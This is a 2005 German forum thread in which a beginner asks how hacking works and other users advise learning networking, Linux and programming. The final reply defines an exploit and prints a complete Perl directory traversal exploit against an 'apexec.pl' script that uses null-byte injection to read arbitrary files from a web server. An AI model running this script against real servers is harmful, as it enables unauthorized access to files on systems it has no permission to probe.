Hacken wie geht das eigentlich?

Dieses Thema im Forum "Sicherheit & Datenschutz" wurde erstellt von KAZ, 24. Mai 2005 .

Status des Themas:
Es sind keine weiteren Antworten möglich.
  1. Diese Seite verwendet Cookies. Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies. Weitere Informationen
  1. #1 24. Mai 2005
    Hi ich hab ne frage wie geht hacken eigentlich also kann mir das mal einer erklären das es ein nuub wie ich auch verstehe also welche programme benutzt man was heisen die begriffe die ich net versthen (fast alle auser ein paar) und könntet ihr wenn es geht glecih die programme hier reinschreiben oda gleich zum download freigeben
    Wenn ihr so net sein würded Kriegt jeder ne 10 von mir der mir das erklärt^^
     

  2. Anzeige
  3. #2 24. Mai 2005
    RE: Für diesen Beitrag bedanken sich folgende User:

    "HACKEN" kann man nicht einfach so erklären

    du brauchst:

    -Interesse (verdammt viel)
    -Neugier
    -Wissensdrang (ließ am tag mind. 50 seiten zu dem thema)
    -Geduld (man lernts ned nur in 5 minuten, man braucht ungefähr ein jahr)
     
  4. #3 24. Mai 2005
    na dan fang mal an "MEISTER" mir das alles zu erklären oda mir tipps zu geben meine icq ist 324-632-554 also wenn as meld dich kk were wirklich nett
     
  5. #4 24. Mai 2005
    "hacken" musst du selber lernen, das wird dir niemand beibringen!


    gruss nireo
     
  6. #5 24. Mai 2005
    Wenn du es kannst wie hast du es dan gelernt kannst du mir das sagen?
     
  7. #6 24. Mai 2005
    kommt drauf an was du hacken willst.

    programmiersprachenkenntnisse wären nich schlecht. und jede menge vorahnung in sachen netzwerke, server, linux usw.
     
  8. #7 24. Mai 2005
    kannst du vllt mir ne seite geben oda selber erklären über die ganzen sachen? z.B. programmiersprachenkenntnisse (welche) ; linux,netzwerke,server (wo kann man das lernen?)
     
  9. #8 24. Mai 2005
    also wichtig ist schonmal das du dich im command auskennt, d.h die befehle ...
    dann musst du dich dafür interessieren wie etwas funktioniert...


    wenn du dich in den großten programmiersprachen ein bisschen auskennst is imer gut, muss ja net besodners sein, cih denke 1 sprache 1 woche und dann hast du enug erfahrung...!

    ich denke wenn du das mal kannst bist du schon sehr weit
     
  10. #9 24. Mai 2005
    also html und php sollten grundmässig sitzen^^

    falls du dir selber exploits (= Sicherheitslücken) schreiben willst, musst du wohl C++ o. ä. können.

    Seiten hab ich da grad nich, aber wie bereits oben erwähnt geht das nich von heute auf morgen.

    Ach ja, und du wirst wohl kaum Programme finden, wo du die URL eingibst und das Programm spuckt dir das Passwort aus (nur mal so zu Info).

    Wie du dir am besten was über Netzwerke und co. beibringen kannst? Vernetze ein paar Pc'S miteinander, lerne die vorgehensweise und die technischen Hintergründe, installier dir Linux und lern damit umzugehen.

    Wird dich erstmal ne weile beschäftigen...
     
  11. #10 24. Mai 2005
    exploits sind keine Sicherheitslücken..
    to exploit heißt ausnutzen und somit bedeutet exploit ein script/programm welches eine Sicherheitslücke ausnutzt.

    Wenn dann c, was aber mit der Zeit immer seltener wird da sich Scriptsprachen wie Perl genausogut eigenen um Exploits zu schreiben, jedoch das schreiben an sich wesentlich weniger Zeit in anspruchnimmt.
    z.B:
    Code:
    #!/usr/bin/perl
    use IO::Socket;
    use Getopt::Std;
    getopts("h:p:f:");
    print "apexec.pl directory traversal attack exploit\n";
    print "\tcoded by XodoX\n\n";
    if(!$opt_f) { die("Usage: $0 -h <host> -p <path> -f <file>\n"); }
    $file = $opt_f;
    $host = $opt_h;
    $path = $opt_p;
    $port = 80;
    print "[x] Host: $host\n";
    print "[x] Path: $path\n";
    print "[x] File: $file\n";
    $request = "GET /$path/apexec.pl?template=/.%00.$file%%0000.html HTTP/1.0\n";
    $request .= "Host: ".$host."\n\n";
    $sock = IO::Socket::INET->new(Proto => 'tcp', PeerAddr => $host, PeerPort => $port) 
    or die("Can't connect!");
    $sock->send($request);
    $sock->recv($data, 1024);
    $sock->recv($data, 9999999);
    print "[x] Data:\n\n $data\n";
    
    oder siehe Metasploit-Project.
     

  12. Videos zum Thema
Die Seite wird geladen...
Similar Threads - Hacken geht eigentlich
  1. Antworten:
    0
    Aufrufe:
    1.226
  2. Antworten:
    28
    Aufrufe:
    5.736
  3. Antworten:
    1
    Aufrufe:
    340
  4. Antworten:
    3
    Aufrufe:
    2.190
  5. Antworten:
    16
    Aufrufe:
    2.785